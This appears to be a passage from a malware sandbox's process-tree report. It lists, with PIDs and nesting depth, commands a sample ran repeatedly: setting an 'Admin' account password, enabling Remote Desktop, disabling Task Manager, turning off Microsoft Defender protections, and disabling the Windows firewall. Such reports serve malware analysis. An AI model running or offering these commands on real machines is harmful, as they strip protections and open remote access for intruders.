        net user Admin D34TH
        84⤵
        
        PID:8380
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        85⤵
        
        PID:4404
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        84⤵
        
        PID:8664
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        84⤵
        
        PID:9528
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        84⤵
        
        PID:6524
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        84⤵
        
        PID:1572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        84⤵
        
        PID:8324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        84⤵
        
        PID:2120
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        82⤵
        
        PID:8316
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        83⤵
        
        PID:8688
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        82⤵
        
        PID:9004
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        82⤵
        
        PID:9136
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        82⤵
        
        PID:8664
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        82⤵
        
        PID:4232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        82⤵
        
        PID:8800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        82⤵
        
        PID:9088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        82⤵
        
        PID:7780
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        80⤵
        
        PID:2776
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        81⤵
        
        PID:5896
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        80⤵
        
        PID:7140
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        80⤵
        
        PID:8496
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        80⤵
        
        PID:6208
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        80⤵
        
        PID:8764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        80⤵
        
        PID:7748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        80⤵
        
        PID:8912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        80⤵
        
        PID:9680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        80⤵
        
        PID:896
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        78⤵
        
        PID:7960
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        79⤵
        
        PID:7044
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        78⤵
        
        PID:6472
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        78⤵
        
        PID:8944
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        78⤵
        
        PID:1600
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        78⤵
        
        PID:7644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        78⤵
        
        PID:4580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        78⤵
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        78⤵
        
        PID:8776
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        76⤵
        
        PID:8468
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        77⤵
        
        PID:8992
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        76⤵
        
        PID:6832
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        76⤵
        
        PID:6188
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        76⤵
        
        PID:8336
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        76⤵
        
        PID:2956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        76⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        76⤵
        
        PID:9824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        76⤵
        
        PID:8968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        76⤵
        
        PID:5792
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        74⤵
        
        PID:6304
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        75⤵
        
        PID:6860
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        74⤵
        
        PID:8900
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        74⤵
        
        PID:9192
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        74⤵
        
        PID:8992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        74⤵
        
        PID:9040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        74⤵
        
        PID:7548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        74⤵
        
        PID:7548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        74⤵
        
        PID:9628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        74⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7500
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        72⤵
        
        PID:5532
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        73⤵
        
        PID:6172
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        72⤵
        
        PID:6172
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        72⤵
        
        PID:8312
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        72⤵
        
        PID:6756
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        72⤵
        
        PID:8572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        72⤵
        
        PID:5548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        72⤵
        
        PID:8960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        72⤵
        
        PID:4236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        72⤵
        
        PID:8176
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        70⤵
        
        PID:6168
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        71⤵
        
        PID:8580
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        70⤵
        
        PID:4624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        70⤵
        
        PID:6088
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        70⤵
        
        PID:7288
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        70⤵
        
        PID:7916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        70⤵
        
        PID:5508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        70⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        70⤵
        
        PID:10140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        70⤵
        
        PID:10092
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        68⤵
        
        PID:9036
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        69⤵
        
        PID:9064
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        68⤵
        
        PID:8372
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        68⤵
        
        PID:4548
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        68⤵
        
        PID:9184
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        68⤵
        
        PID:8204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        68⤵
        
        PID:7220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        68⤵
        
        PID:7620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        68⤵
        
        PID:5364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        68⤵
        
        PID:5188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        68⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9656
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        66⤵
        
        PID:7196
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        67⤵
        
        PID:5424
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        66⤵
        
        PID:8364
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        66⤵
        
        PID:8672
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        66⤵
        
        PID:8424
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        66⤵
        
        PID:6156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        66⤵
        
        PID:6060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        66⤵
        
        PID:1260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        66⤵
        
        PID:7900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        66⤵
        
        PID:7040
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        64⤵
        
        PID:5960
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        65⤵
        
        PID:3524
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        64⤵
        
        PID:4184
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        64⤵
        
        PID:3524
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        64⤵
        
        PID:8088
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        64⤵
        
        PID:8296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        64⤵
        
        PID:9100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        64⤵
        
        PID:8836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        64⤵
        
        PID:2516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        64⤵
        
        PID:9820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        64⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2624
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        62⤵
        
        PID:6904
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        63⤵
        
        PID:2528
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        62⤵
        
        PID:4660
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        62⤵
        
        PID:3688
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        62⤵
        
        PID:8140
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        62⤵
        
        PID:5588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        62⤵
        
        PID:7004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        62⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        62⤵
        
        PID:5128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        62⤵
        
        PID:6388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        62⤵
        
        PID:8448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        62⤵
        
        PID:9228
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        60⤵
        
        PID:8088
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        61⤵
        
        PID:7148
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        60⤵
        
        PID:6620
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        60⤵
        
        PID:6372
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        60⤵
        
        PID:7648
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        60⤵
        
        PID:2684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        60⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        60⤵
        
        PID:9136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        60⤵
        
        PID:8868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        60⤵
        
        PID:8764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        60⤵
        
        PID:3612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        60⤵
        
        PID:6228
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        58⤵
        
        PID:5660
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        59⤵
        
        PID:6256
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        58⤵
        
        PID:6492
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        58⤵
        
        PID:8160
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        58⤵
        
        PID:3348
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        58⤵
        
        PID:5932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        58⤵
        
        PID:7588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        58⤵
        
        PID:9108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        58⤵
        
        PID:7628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        58⤵
        
        PID:7828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        58⤵
        
        PID:9760
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        56⤵
        
        PID:7556
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        57⤵
        
        PID:5096
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        56⤵
        
        PID:2440
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        56⤵
        
        PID:5756
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        56⤵
        
        PID:6892
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        56⤵
        
        PID:6248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        56⤵
        
        PID:6576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        56⤵
        
        PID:7916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        56⤵
        
        PID:8364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        56⤵
        
        PID:2312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        56⤵
        
        PID:5960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        56⤵
        
        PID:8360
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        56⤵
        Modifies Windows Firewall
        
        PID:6428
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        56⤵
        
        PID:8512
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        54⤵
        
        PID:6140
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        55⤵
        
        PID:7312
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        54⤵
        
        PID:7624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        54⤵
        
        PID:6024
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        54⤵
        
        PID:7260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        54⤵
        
        PID:6860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        54⤵
        
        PID:6268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        54⤵
        
        PID:5132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        54⤵
        
        PID:5360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        54⤵
        
        PID:8392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        54⤵
        
        PID:8392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        54⤵
        
        PID:7860
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        54⤵
        
        PID:9248
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        54⤵
        
        PID:5308
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        54⤵
        
        PID:8540
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        52⤵
        
        PID:6520
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        53⤵
        
        PID:7468
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        52⤵
        
        PID:5952
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        52⤵
        
        PID:6864
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        52⤵
        
        PID:7004
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        52⤵
        
        PID:7968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        52⤵
        
        PID:7636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        52⤵
        
